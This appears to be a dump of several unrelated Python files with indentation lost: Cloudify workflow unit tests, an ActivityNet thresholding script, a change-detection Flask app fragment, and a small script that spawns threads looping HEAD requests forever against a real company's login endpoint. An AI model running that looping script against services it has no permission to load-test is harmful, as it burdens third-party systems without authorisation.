self.assertEqual(sorted_ops, sorted(node2.operations.keys()))
self.assertIs(relationship, node1.get_relationship('node2'))
self.assertIn('node_', instance1.id)
self.assertIn('node2_', instance2.id)
self.assertEqual('node', instance1.node_id)
self.assertEqual('node2', instance2.node_id)
self.assertIs(node1, instance1.node)
self.assertIs(node2, instance2.node)
self.assertEqual(node2.id, relationship.target_id)
self.assertTrue(relationship.is_derived_from(
"cloudify.relationships.contained_in"
))
self.assertEqual(node2, relationship.target_node)
self.assertEqual(sorted_ops,
sorted(relationship.source_operations.keys()))
self.assertEqual(sorted_ops,
sorted(relationship.target_operations.keys()))
self.assertEqual(instance2.id, relationship_instance.target_id)
self.assertEqual(instance2,
relationship_instance.target_node_instance)
self.assertIs(relationship, relationship_instance.relationship)
self._execute_workflow(blueprint_model)
def test_operation_capabilities(self):
def the_workflow(ctx, **_):
instance = _instance(ctx, 'node')
instance2 = _instance(ctx, 'node2')
instance2.execute_operation('test.op0').get()
instance.execute_operation('test.op1').get()
def op0(ctx, **_):
ctx.instance.runtime_properties['key'] = 'value'
def op1(ctx, **_):
caps = ctx.capabilities.get_all()
self.assertEqual(1, len(caps))
key, value = next(caps.iteritems())
self.assertIn('node2_', key)
self.assertEqual(value, {'key': 'value'})
self._execute_workflow(the_workflow, operation_methods=[op0, op1])
def test_operation_runtime_properties(self):
def runtime_properties(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0').get()
instance.execute_operation('test.op1').get()
def op0(ctx, **_):
ctx.instance.runtime_properties['key'] = 'value'
def op1(ctx, **_):
self.assertEqual('value', ctx.instance.runtime_properties['key'])
self._execute_workflow(runtime_properties, operation_methods=[
op0, op1])
def test_operation_related_properties(self):
def the_workflow(ctx, **_):
instance = _instance(ctx, 'node')
relationship = next(instance.relationships)
relationship.execute_source_operation('test.op0')
relationship.execute_target_operation('test.op0')
def op(ctx, **_):
if 'node2_' in ctx.target.instance.id:
self.assertThat(ctx.target.node.properties.items(),
ContainsAll({'property': 'default'}.items()))
elif 'node_' in ctx.target.instance.id:
self.assertThat(ctx.target.node.properties.items(),
ContainsAll({'property': 'value'}.items()))
else:
self.fail('unexpected: {0}'.format(ctx.target.instance.id))
self._execute_workflow(the_workflow, operation_methods=[op])
def test_operation_related_runtime_properties(self):
def related_runtime_properties(ctx, **_):
instance = _instance(ctx, 'node')
instance2 = _instance(ctx, 'node2')
relationship = next(instance.relationships)
instance.execute_operation('test.op0',
kwargs={'value': 'instance1'}).get()
instance2.execute_operation('test.op0',
kwargs={'value': 'instance2'}).get()
relationship.execute_source_operation(
'test.op1', kwargs={
'source': 'instance1',
'target': 'instance2'
}).get()
relationship.execute_target_operation(
'test.op1', kwargs={
'source': 'instance1',
'target': 'instance2'
}).get()
def op0(ctx, value, **_):
ctx.instance.runtime_properties['key'] = value
def op1(ctx, source, target, **_):
self.assertEqual(source,
ctx.source.instance.runtime_properties['key'])
self.assertEqual(target,
ctx.target.instance.runtime_properties['key'])
self._execute_workflow(related_runtime_properties, operation_methods=[
op0, op1])
def test_operation_ctx_properties_and_methods(self):
def flow(ctx, **_):
instance = _instance(ctx, 'node')
instance.set_state('state').get()
instance.execute_operation('test.op0').get()
target_path = ctx.internal.handler.download_deployment_resource(
'resource')
with open(target_path) as f:
self.assertEqual('content', f.read())
def ctx_properties(ctx, **_):
self.assertEqual('node', ctx.node.name)
self.assertIn('node_', ctx.instance.id)
self.assertEqual(self._testMethodName, ctx.blueprint.id)
self.assertEqual(self._testMethodName, ctx.deployment.id)
self.assertIsNotNone(ctx.execution_id)
self.assertEqual('workflow0', ctx.workflow_id)
self.assertIsNotNone(ctx.task_id)
self.assertEqual('{0}.{1}'.format(self._testMethodName,
'ctx_properties'),
ctx.task_name)
self.assertIsNone(ctx.task_target)
self.assertEqual('p', ctx.plugin)
self.assertEqual('p', ctx.plugin.name)
self.assertEqual(PLUGIN_PACKAGE_NAME, ctx.plugin.package_name)
self.assertEqual(PLUGIN_PACKAGE_VERSION,
ctx.plugin.package_version)
self.assertEqual(sys.prefix, ctx.plugin.prefix)
self.assertEqual('test.op0', ctx.operation.name)
self.assertThat(ctx.node.properties.items(),
ContainsAll({'property': 'value'}.items()))
self.assertEqual('content', ctx.get_resource('resource'))
target_path = ctx.download_resource('resource')
with open(target_path) as f:
self.assertEqual('content', f.read())
expected_target_path = os.path.join(self.work_dir, 'resource')
target_path = ctx.download_resource(
'resource', target_path=expected_target_path)
self.assertEqual(target_path, expected_target_path)
with open(target_path) as f:
self.assertEqual('content', f.read())
self._execute_workflow(flow, operation_methods=[ctx_properties])
def test_ctx_host_ip(self):
def op0(ctx, **_):
ctx.instance.runtime_properties['ip'] = '2.2.2.2'
def op1(ctx, expected_ip, **_):
self.assertEqual(ctx.instance.host_ip, expected_ip)
def flow(ctx, **_):
instance1 = _instance(ctx, 'node')
instance4 = _instance(ctx, 'node4')
# these are hosts
# in this one will will set a runtime_property of ip
instance2 = _instance(ctx, 'node2')
# this one has ip as static properties
instance3 = _instance(ctx, 'node3')
instance2.execute_operation('test.op0').get()
instance1.execute_operation('test.op1', kwargs={
'expected_ip': '2.2.2.2'
}).get()
instance2.execute_operation('test.op1', kwargs={
'expected_ip': '2.2.2.2'
}).get()
instance3.execute_operation('test.op1', kwargs={
'expected_ip': '1.1.1.1'
}).get()
instance4.execute_operation('test.op1', kwargs={
'expected_ip': '1.1.1.1'
}).get()
self._execute_workflow(flow, operation_methods=[op0, op1])
def test_operation_bootstrap_context(self):
bootstrap_context = {'stub': 'prop'}
provider_context = {
'cloudify': bootstrap_context
}
def contexts(ctx, **_):
self.assertEqual(bootstrap_context,
ctx.bootstrap_context._bootstrap_context)
self.assertEqual(provider_context, ctx.provider_context)
self._execute_workflow(operation_methods=[contexts],
provider_context=provider_context)
def test_workflow_graph_mode(self):
def flow(ctx, **_):
instance = _instance(ctx, 'node')
graph = ctx.graph_mode()
sequence = graph.sequence()
sequence.add(instance.execute_operation('test.op2'))
sequence.add(instance.execute_operation('test.op1'))
sequence.add(instance.execute_operation('test.op0'))
graph.execute()
def op0(ctx, **_):
invocation = ctx.instance.runtime_properties['invocation']
self.assertEqual(2, invocation)
def op1(ctx, **_):
invocation = ctx.instance.runtime_properties['invocation']
self.assertEqual(1, invocation)
ctx.instance.runtime_properties['invocation'] += 1
def op2(ctx, **_):
invocation = ctx.instance.runtime_properties.get('invocation')
self.assertIsNone(invocation)
ctx.instance.runtime_properties['invocation'] = 1
self._execute_workflow(flow, operation_methods=[op0, op1, op2])
def test_node_instance_version_conflict(self):
def flow(ctx, **_):
pass
# stub to get a properly initialized storage instance
self._execute_workflow(flow)
storage = self.env.storage
instance = storage.get_node_instances()[0]
storage.update_node_instance(
instance.id,
runtime_properties={},
state=instance.state,
version=instance.version)
instance_id = instance.id
exception = Queue.Queue()
done = Queue.Queue()
def proceed():
try:
done.get_nowait()
return False
except Queue.Empty:
return True
def publisher(key, value):
def func():
timeout = time.time() + 5
while time.time() < timeout and proceed():
p_instance = storage.get_node_instance(instance_id)
p_instance.runtime_properties[key] = value
try:
storage.update_node_instance(
p_instance.id,
runtime_properties=p_instance.runtime_properties,
state=p_instance.state,
version=p_instance.version)
except local.StorageConflictError, e:
exception.put(e)
done.put(True)
return
return func
publisher1 = publisher('publisher1', 'value1')
publisher2 = publisher('publisher2', 'value2')
publisher1_thread = threading.Thread(target=publisher1)
publisher2_thread = threading.Thread(target=publisher2)
publisher1_thread.daemon = True
publisher2_thread.daemon = True
publisher1_thread.start()
publisher2_thread.start()
publisher1_thread.join()
publisher2_thread.join()
conflict_error = exception.get_nowait()
self.assertIn('does not match current', conflict_error.message)
def test_get_node(self):
def flow(ctx, **_):
pass
# stub to get a properly initialized storage instance
self._execute_workflow(flow)
storage = self.env.storage
node = storage.get_node('node')
self.assertEqual(node.properties['property'], 'value')
def test_get_node_missing(self):
def flow(ctx, **_):
pass
# stub to get a properly initialized storage instance
self._execute_workflow(flow)
storage = self.env.storage
self.assertRaises(RuntimeError,
storage.get_node, 'node_that_does_not_exist')
def test_execute_non_existent_operation(self):
def flow(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('non_existent')
with testtools.testcase.ExpectedException(RuntimeError,
".*does not exist.*"):
self._execute_workflow(flow)
def test_operation_retry_configuration(self):
self._test_retry_configuration_impl(
global_retries=100,
global_retry_interval=100,
operation_retries=1,
operation_retry_interval=1
)
class LocalWorkflowTestInMemoryStorage(LocalWorkflowTest, testtools.TestCase):
def setUp(self):
super(LocalWorkflowTestInMemoryStorage, self).setUp()
self.storage_cls = local.InMemoryStorage
class LocalWorkflowTestFileStorage(LocalWorkflowTest, testtools.TestCase):
def setUp(self):
super(LocalWorkflowTestFileStorage, self).setUp()
self.storage_cls = local.FileStorage
self.storage_kwargs = {'storage_dir': self.storage_dir}
class FileStorageTest(BaseWorkflowTest, testtools.TestCase):
def setUp(self):
super(FileStorageTest, self).setUp()
self.storage_cls = local.FileStorage
self.storage_kwargs = {'storage_dir': self.storage_dir}
def test_storage_dir(self):
def stub_workflow(ctx, **_):
pass
self._execute_workflow(stub_workflow, name=self._testMethodName)
self.assertTrue(os.path.isdir(
os.path.join(self.storage_dir, self._testMethodName)))
def test_persistency(self):
bootstrap_context = {'stub': 'prop'}
provider_context = {'cloudify': bootstrap_context}
def persistency_1(ctx, **_):
instance = _instance(ctx, 'node')
instance.set_state('persistency')
instance.execute_operation('test.op0').get()
def persistency_2(ctx, **_):
instance = _instance(ctx, 'node')
self.assertEqual('persistency', instance.get_state().get())
instance.execute_operation('test.op0').get()
def op(ctx, **_):
self.assertEqual('new_input', ctx.node.properties['from_input'])
self.assertEqual('content', ctx.get_resource('resource'))
self.assertEqual(bootstrap_context,
ctx.bootstrap_context._bootstrap_context)
self.assertEqual(provider_context, ctx.provider_context)
self._setup_env(workflow_methods=[persistency_1, persistency_2],
operation_methods=[op],
inputs={'from_input': 'new_input'},
provider_context=provider_context)
self._execute_workflow(workflow_name='workflow0',
setup_env=False, load_env=True)
self._execute_workflow(workflow_name='workflow1',
setup_env=False, load_env=True)
def test_path_agnostic_persistency(self):
# tests file storage isn't dependent on the blueprint directory
# for resources (but stores its own copies instead)
def persistency(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0').get()
def op(ctx, **_):
self.assertEqual('new_input', ctx.node.properties['from_input'])
self.assertEqual('content', ctx.get_resource('resource'))
self._setup_env(workflow_methods=[persistency],
operation_methods=[op],
inputs={'from_input': 'new_input'})
shutil.rmtree(self.blueprint_dir)
self._execute_workflow(workflow_name='workflow0',
setup_env=False, load_env=True)
def test_local_init_in_blueprint_dir(self):
self.blueprint_dir = self.storage_dir
def flow(ctx, **_):
pass
self._setup_env(workflow_methods=[flow])
def test_workdir(self):
content = 'CONTENT'
def op0(ctx, **_):
self.assertEquals(
ctx.plugin.workdir,
os.path.join(self.storage_dir, self._testMethodName,
'workdir', 'plugins', 'p'))
work_file = os.path.join(ctx.plugin.workdir, 'work_file')
self.assertFalse(os.path.exists(work_file))
with open(work_file, 'w') as f:
f.write(content)
def op1(ctx, **_):
work_file = os.path.join(ctx.plugin.workdir, 'work_file')
with open(work_file) as f:
print work_file
self.assertEqual(content, f.read())
def workflow1(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0').get()
def workflow2(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op1').get()
self._setup_env(workflow_methods=[workflow1, workflow2],
operation_methods=[op0, op1])
self._execute_workflow(workflow_name='workflow0',
setup_env=False, load_env=True)
self._execute_workflow(workflow_name='workflow1',
setup_env=False, load_env=True)
class LocalWorkflowEnvironmentTest(BaseWorkflowTest, testtools.TestCase):
def setUp(self):
super(LocalWorkflowEnvironmentTest, self).setUp()
self.storage_cls = local.InMemoryStorage
def test_inputs(self):
def op(ctx, **_):
self.assertEqual('new_input', ctx.node.properties['from_input'])
self._execute_workflow(operation_methods=[op],
inputs={'from_input': 'new_input'})
def test_outputs(self):
def op(ctx, **_):
pass
self._execute_workflow(operation_methods=[op],
use_existing_env=False)
self.assertEqual(self.env.outputs(),
{'some_output': None, 'static': 'value'})
def op(ctx, **_):
ctx.instance.runtime_properties['some_output'] = 'value'
self._execute_workflow(operation_methods=[op],
use_existing_env=False)
self.assertEqual(self.env.outputs(),
{'some_output': 'value', 'static': 'value'})
def test_workflow_return_value(self):
def flow(ctx, **_):
return 1
self.assertEqual(1, self._execute_workflow(flow))
def test_blueprint_imports(self):
def flow(ctx, **_):
node = ctx.get_node('node5')
self.assertEqual('imported_type', node.type)
self._execute_workflow(flow)
def test_workflow_parameters(self):
normal_schema = {
'from_invocation': {},
'from_default': {
'default': 'from_default_default'
},
'invocation_overrides_default': {
'default': 'invocation_overrides_default_default'
}
}
normal_execute_kwargs = {
'parameters': {
'from_invocation': 'from_invocation',
'invocation_overrides_default':
'invocation_overrides_default_override'
}
}
def normal_flow(ctx,
from_invocation,
from_default,
invocation_overrides_default,
**_):
self.assertEqual(from_invocation, 'from_invocation')
self.assertEqual(from_default, 'from_default_default')
self.assertEqual(invocation_overrides_default,
'invocation_overrides_default_override')
self._execute_workflow(normal_flow,
execute_kwargs=normal_execute_kwargs,
workflow_parameters_schema=normal_schema,
use_existing_env=False)
# now test missing
missing_schema = normal_schema.copy()
missing_schema['missing_parameter'] = {}
missing_flow = normal_flow
missing_execute_kwargs = normal_execute_kwargs
self.assertRaises(ValueError,
self._execute_workflow,
missing_flow,
execute_kwargs=missing_execute_kwargs,
workflow_parameters_schema=missing_schema,
use_existing_env=False)
# now test invalid custom parameters
invalid_custom_schema = normal_schema
invalid_custom_flow = normal_flow
invalid_custom_kwargs = normal_execute_kwargs.copy()
invalid_custom_kwargs['parameters']['custom_parameter'] = 'custom'
self.assertRaises(ValueError,
self._execute_workflow,
invalid_custom_flow,
execute_kwargs=invalid_custom_kwargs,
workflow_parameters_schema=invalid_custom_schema,
use_existing_env=False)
# now test valid custom parameters
def valid_custom_flow(ctx,
from_invocation,
from_default,
invocation_overrides_default,
custom_parameter,
**_):
self.assertEqual(from_invocation, 'from_invocation')
self.assertEqual(from_default, 'from_default_default')
self.assertEqual(invocation_overrides_default,
'invocation_overrides_default_override')
self.assertEqual(custom_parameter, 'custom')
valid_custom_schema = normal_schema
valid_custom_kwargs = normal_execute_kwargs.copy()
valid_custom_kwargs['parameters']['custom_parameter'] = 'custom'
valid_custom_kwargs['allow_custom_parameters'] = True
self._execute_workflow(
valid_custom_flow,
execute_kwargs=valid_custom_kwargs,
workflow_parameters_schema=valid_custom_schema,
use_existing_env=False)
def test_workflow_parameters_types(self):
workflow = {
'parameters': {
'optional1': {'default': 7},
'optional2': {'default': 'bla'},
'optional_int1': {
'default': 1,
'type': 'integer'
},
'optional_int2': {
'default': 2,
'type': 'integer'
},
'optional_float1': {
'default': 1.5,
'type': 'float'
},
'optional_float2': {
'default': 2,
'type': 'float'
},
'optional_str1': {
'default': 'bla',
'type': 'string'
},
'optional_str2': {
'default': 'blabla',
'type': 'string'
},
'optional_bool1': {
'default': 'False',
'type': 'boolean'
},
'optional_bool2': {
'default': 'True',
'type': 'boolean'
},
'mandatory1': {},
'mandatory2': {},
'mandatory_int1': {'type': 'integer'},
'mandatory_int2': {'type': 'integer'},
'mandatory_float1': {'type': 'float'},
'mandatory_float2': {'type': 'float'},
'mandatory_str1': {'type': 'string'},
'mandatory_str2': {'type': 'string'},
'mandatory_bool1': {'type': 'boolean'},
'mandatory_bool2': {'type': 'boolean'}
}
}
self._test_workflow_mandatory_parameters_types(workflow)
self._test_workflow_optional_parameters_types(workflow)
self._test_workflow_custom_parameters_types(workflow)
def _test_workflow_mandatory_parameters_types(self, workflow):
parameters = {
'mandatory1': 'bla',
'mandatory2': 6,
'mandatory_int1': 1,
'mandatory_int2': 'bla',
'mandatory_float1': 3.5,
'mandatory_float2': True,
'mandatory_str1': 'bla',
'mandatory_str2': 7,
'mandatory_bool1': False,
'mandatory_bool2': 'boolean_that_is_not_string'
}
try:
local._merge_and_validate_execution_parameters(
workflow, 'workflow', parameters)
except ValueError, e:
# check which parameters are mentioned in the error message
self.assertIn('mandatory_int2', str(e))
self.assertIn('mandatory_float2', str(e))
self.assertIn('mandatory_str2', str(e))
self.assertIn('mandatory_bool2', str(e))
self.assertNotIn('mandatory1', str(e))
self.assertNotIn('mandatory2', str(e))
self.assertNotIn('mandatory_int1', str(e))
self.assertNotIn('mandatory_float1', str(e))
self.assertNotIn('mandatory_str1', str(e))
self.assertNotIn('mandatory_bool1', str(e))
else:
self.fail()
def _test_workflow_optional_parameters_types(self, workflow):
parameters = {
'mandatory1': False,
'mandatory2': [],
'mandatory_int1': '-7',
'mandatory_int2': 3.5,
'mandatory_float1': '5.0',
'mandatory_float2': [],
'mandatory_str1': u'bla',
'mandatory_str2': ['bla'],
'mandatory_bool1': 'tRUe',
'mandatory_bool2': 0,
'optional1': 'bla',
'optional2': 6,
'optional_int1': 1,
'optional_int2': 'bla',
'optional_float1': 3.5,
'optional_float2': True,
'optional_str1': 'bla',
'optional_str2': 7,
'optional_bool1': False,
'optional_bool2': 'bla'
}
try:
local._merge_and_validate_execution_parameters(
workflow, 'workflow', parameters)
except ValueError, e:
# check which parameters are mentioned in the error message
self.assertIn('mandatory_int2', str(e))
self.assertIn('mandatory_float2', str(e))
self.assertIn('mandatory_str2', str(e))
self.assertIn('mandatory_bool2', str(e))
self.assertNotIn('mandatory1', str(e))
self.assertNotIn('mandatory2', str(e))
self.assertNotIn('mandatory_int1', str(e))
self.assertNotIn('mandatory_float1', str(e))
self.assertNotIn('mandatory_str1', str(e))
self.assertNotIn('mandatory_bool1', str(e))
self.assertIn('optional_int2', str(e))
self.assertIn('optional_float2', str(e))
self.assertIn('optional_str2', str(e))
self.assertIn('optional_bool2', str(e))
self.assertNotIn('optional1', str(e))
self.assertNotIn('optional2', str(e))
self.assertNotIn('optional_int1', str(e))
self.assertNotIn('optional_float1', str(e))
self.assertNotIn('optional_str1', str(e))
self.assertNotIn('optional_bool1', str(e))
else:
self.fail()
def _test_workflow_custom_parameters_types(self, workflow):
parameters = {
'mandatory1': False,
'mandatory2': [],
'mandatory_int1': -7,
'mandatory_int2': 3,
'mandatory_float1': 5.0,
'mandatory_float2': 0.0,
'mandatory_str1': u'bla',
'mandatory_str2': 'bla',
'mandatory_bool1': True,
'mandatory_bool2': False,
'optional1': 'bla',
'optional2': 6,
'optional_int1': 1,
'optional_int2': 'bla',
'optional_float1': 3.5,
'optional_str1': 'bla',
'optional_bool1': 'falSE',
'custom1': 8,
'custom2': 3.2,
'custom3': 'bla',
'custom4': True
}
try:
local._merge_and_validate_execution_parameters(
workflow, 'workflow', parameters, True)
except ValueError, e:
# check which parameters are mentioned in the error message
self.assertNotIn('mandatory_int2', str(e))
self.assertNotIn('mandatory_float2', str(e))
self.assertNotIn('mandatory_str2', str(e))
self.assertNotIn('mandatory_bool2', str(e))
self.assertNotIn('mandatory1', str(e))
self.assertNotIn('mandatory2', str(e))
self.assertNotIn('mandatory_int1', str(e))
self.assertNotIn('mandatory_float1', str(e))
self.assertNotIn('mandatory_str1', str(e))
self.assertNotIn('mandatory_bool1', str(e))
self.assertIn('optional_int2', str(e))
self.assertNotIn('optional_float2', str(e))
self.assertNotIn('optional_str2', str(e))
self.assertNotIn('optional_bool2', str(e))
self.assertNotIn('optional1', str(e))
self.assertNotIn('optional2', str(e))
self.assertNotIn('optional_int1', str(e))
self.assertNotIn('optional_float1', str(e))
self.assertNotIn('optional_str1', str(e))
self.assertNotIn('optional_bool1', str(e))
self.assertNotIn('custom1', str(e))
self.assertNotIn('custom2', str(e))
self.assertNotIn('custom3', str(e))
self.assertNotIn('custom4', str(e))
else:
self.fail()
def test_global_retry_configuration(self):
self._test_retry_configuration_impl(
global_retries=1,
global_retry_interval=1,
operation_retries=None,
operation_retry_interval=None
)
def test_local_task_thread_pool_size(self):
default_size = workflow_context.DEFAULT_LOCAL_TASK_THREAD_POOL_SIZE
def flow(ctx, **_):
task_processor = ctx.internal.local_tasks_processor
self.assertEqual(len(task_processor._local_task_processing_pool),
default_size)
self._execute_workflow(
flow,
use_existing_env=False)
def flow(ctx, **_):
task_processor = ctx.internal.local_tasks_processor
self.assertEqual(len(task_processor._local_task_processing_pool),
default_size + 1)
self._execute_workflow(
flow,
execute_kwargs={'task_thread_pool_size': default_size + 1},
use_existing_env=False)
def test_no_operation_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='operation')
def test_no_operation_module_ignored(self):
def op1(ctx, **_):
pass
self._execute_workflow(operation_methods=[op1],
ignored_modules=['ignored_module'])
def test_no_operation_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='operation')
def test_no_source_operation_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='source')
def test_no_source_operation_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='source')
def test_no_target_operation_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='target')
def test_no_target_operation_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='target')
def test_no_workflow_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='workflow')
def test_no_workflow_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='workflow')
def test_no_workflow(self):
try:
self._execute_workflow(workflow_name='does_not_exist')
self.fail()
except ValueError, e:
self.assertIn("['workflow0']", e.message)
def test_getting_contained_elements(self):
def check_subgraph(ctx, **_):
node_host = _instance(ctx, 'node_host')
node = _instance(ctx, 'node')
node2 = _instance(ctx, 'node2')
node3 = _instance(ctx, 'node3')
node4 = _instance(ctx, 'node4')
full_contained_subgraph = set([
node_host,
node,
node2,
node3,
node4
])
self.assertEqual(
full_contained_subgraph,
node_host.get_contained_subgraph()
)
half_subgraph = set([
node,
node2
])
self.assertEqual(
half_subgraph,
node2.get_contained_subgraph()
)
host_contained_instances = set([
node2,
node3
])
self.assertEqual(
host_contained_instances,
set(node_host.contained_instances)
)
self.assertEqual(
[],
node.contained_instances
)
self._execute_workflow(
check_subgraph,
create_blueprint_func=self._blueprint_3
)
def _no_module_or_attribute_test(self, is_missing_module, test_type):
try:
self._execute_workflow(
create_blueprint_func=self._blueprint_2(is_missing_module,
test_type),
workflow_name='workflow')
self.fail()
except (ImportError, AttributeError, NonRecoverableError) as e:
if is_missing_module:
self.assertIn('No module named zzz', e.message)
if test_type != 'workflow':
self.assertIn(test_type, e.message)
self.assertTrue(isinstance(e, ImportError))
else:
if test_type == 'workflow':
thing1 = 'function'
thing2 = ' named'
else:
thing1 = 'attribute'
thing2 = ''
self.assertIn("has no {0}{1} 'does_not_exist'".format(thing1,
thing2),
e.message)
if test_type != 'workflow':
self.assertIn(test_type, e.message)
self.assertTrue(isinstance(e, AttributeError))
def _blueprint_2(self,
is_missing_module,
test_type):
def func(*_):
module_name = 'zzz' if is_missing_module else self._testMethodName
interfaces = {
'test': {
'op': 'p.{0}.{1}'.format(module_name, 'does_not_exist')
}
}
blueprint = {
'tosca_definitions_version': 'cloudify_dsl_1_0',
'plugins': {
'p': {
'executor': 'central_deployment_agent',
'install': False
}
},
'node_types': {
'type': {}
},
'relationships': {
'cloudify.relationships.contained_in': {}
},
'node_templates': {
'node2': {
'type': 'type',
},
'node': {
'type': 'type',
'relationships': [{
'target': 'node2',
'type': 'cloudify.relationships.contained_in',
}]
},
},
'workflows': {
'workflow': 'p.{0}.{1}'.format(module_name,
'does_not_exist')
}
}
node = blueprint['node_templates']['node']
relationship = node['relationships'][0]
if test_type == 'operation':
node['interfaces'] = interfaces
elif test_type == 'source':
relationship['source_interfaces'] = interfaces
elif test_type == 'target':
relationship['target_interfaces'] = interfaces
elif test_type == 'workflow':
pass
else:
self.fail('unsupported: {}'.format(test_type))
return blueprint
return func
def _blueprint_3(self, workflow_methods, _,
workflow_parameters_schema, __, *args):
workflows = dict((
('workflow{0}'.format(index), {
'mapping': 'p.{0}.{1}'.format(self._testMethodName,
w_method.__name__),
'parameters': workflow_parameters_schema or {}
}) for index, w_method in enumerate(workflow_methods)
))
blueprint = {
'tosca_definitions_version': 'cloudify_dsl_1_0',
'plugins': {
'p': {
'executor': 'central_deployment_agent',
'install': False
}
},
'node_types': {
'type': {},
},
'relationships': {
'cloudify.relationships.contained_in': {}
},
'node_templates': {
'node_host': {
'type': 'type'
},
'node4': {
'type': 'type',
'relationships': [{
'target': 'node3',
'type': 'cloudify.relationships.contained_in',
}]
},
'node3': {
'type': 'type',
'relationships': [{
'target': 'node_host',
'type': 'cloudify.relationships.contained_in',
}]
},
'node2': {
'type': 'type',
'relationships': [{
'target': 'node_host',
'type': 'cloudify.relationships.contained_in',
}]
},
'node': {
'type': 'type',
'relationships': [{
'target': 'node2',
'type': 'cloudify.relationships.contained_in',
}]
},
'outside_node': {
'type': 'type'
}
},
'workflows': workflows
}
return blueprint
def _instance(ctx, node_name):
return next(ctx.get_node(node_name).instances)
|
test_http_request.py
|
__author__ = 'wenjusun'
from httplib import HTTPConnection
from httplib import HTTPSConnection
import threading
import time
import sys
def download(host,path):
common_httpreq(HTTPConnection(host),path)
def https_download(host,path):
common_httpreq(HTTPSConnection(host),path)
def common_httpreq(httpcon,path):
while True:
httpcon.connect()
httpcon.request('HEAD',path)
resp = httpcon.getresponse()
if(resp.status != 200):
print "Failed: %d,%s" % (resp.status,resp.reason)
time.sleep(10)
httpcon.close()
def get_current_time_inmills():
return int(round(time.time()*1000))
if __name__ == '__main__':
#https://accounts.motorola.com.cn/ssoauth/login
host = 'accounts.motorola.com.cn'
path = '/ssoauth/login'
LOOPS=1
"""
print sys.argv
if sys.argv:
if len(sys.argv) == 4:
host = sys.argv[1]
path = sys.argv[2]
LOOPS = int(sys.argv[3])
else:
print "Please both input host and path,loops "
exit(0)
else:
print "Please input host and path,loops "
exit(0)
"""
print time.ctime()
start_time_inmills = get_current_time_inmills()
thread_list=[]
for i in range(0,LOOPS):
# t = threading.Thread(target=download,args=(host,path,i))
t = threading.Thread(target=https_download,args=(host,path,i))
thread_list.append(t)
for t in thread_list:
t.start()
pass
for t in thread_list:
t.join()
pass
print time.ctime()
print "total cost:%d seconds" % (get_current_time_inmills()-start_time_inmills)
|
threshold.py
|
import os
import numpy as np
import json
from AFSD.common.anet_dataset import load_json
from AFSD.common.config import config
from test import get_basic_config, inference_thread
import multiprocessing as mp
import threading
def compute_threshold(result_dict, scoring='confidence'):
all_scores = []
for vid, proposal_list in result_dict.items():
for prop in proposal_list:
if scoring == 'uncertainty':
ood_score = 1 - prop['uncertainty']
elif scoring == 'confidence':
ood_score = prop['score']
elif scoring == 'uncertainty_actionness':
ood_score = 1 - prop['uncertainty'] * prop['actionness']
all_scores.append(ood_score)
score_sorted = np.sort(all_scores) # sort the confidence score in an increasing order
N = len(all_scores)
topK = N - int(N * 0.95)
threshold = score_sorted[topK-1]
return threshold
def thresholding(cfg, output_file, thread_num=1):
processes = []
lock = threading.Lock()
train_cls_data = load_json('datasets/activitynet/result_tsn_train.json')
videos_in_clsdata = ['v_' + name for name in list(train_cls_data['results'].keys())]
videos_in_annodata = list(cfg.video_infos.keys())
video_list = list(set(videos_in_clsdata) & set(videos_in_annodata))
video_num = len(video_list)
per_thread_video_num = video_num // thread_num
result_dict = mp.Manager().dict()
for i in range(thread_num):
if i == thread_num - 1:
sub_video_list = video_list[i * per_thread_video_num:]
else:
sub_video_list = video_list[i * per_thread_video_num: (i + 1) * per_thread_video_num]
# inference_thread(lock, i, sub_video_list, train_cls_data, cfg)
p = mp.Process(target=inference_thread, args=(lock, i, sub_video_list, train_cls_data, cfg, result_dict))
p.start()
processes.append(p)
for p in processes:
p.join()
# compute threshold value
threshold = compute_threshold(result_dict, scoring=cfg.scoring)
output_dict = {"version": "ActivityNet-v1.3", "results": dict(result_dict), "external_data": {'threshold': threshold}}
with open(output_file, "w") as out:
json.dump(output_dict, out)
return threshold
def main():
cfg = get_basic_config(config, dataset='training')
output_file = os.path.join(cfg.output_path, cfg.json_name)
if not os.path.exists(output_file):
threshold = thresholding(cfg, output_file, thread_num=cfg.thread_num)
else:
with open(output_file, 'r') as fobj:
data = json.load(fobj)
threshold = data['external_data']['threshold']
print(f'Thresholding result file already exist at {output_file}!')
print(f'The threshold is: {threshold:.12f}')
if __name__ == '__main__':
# keep all things private in this file
main()
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import flask_login
from flask_login import login_required
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_from_directory, abort, redirect, url_for, flash
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
app = Flask(__name__, static_url_path="/var/www/change-detection/backend/static")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember python is by reference
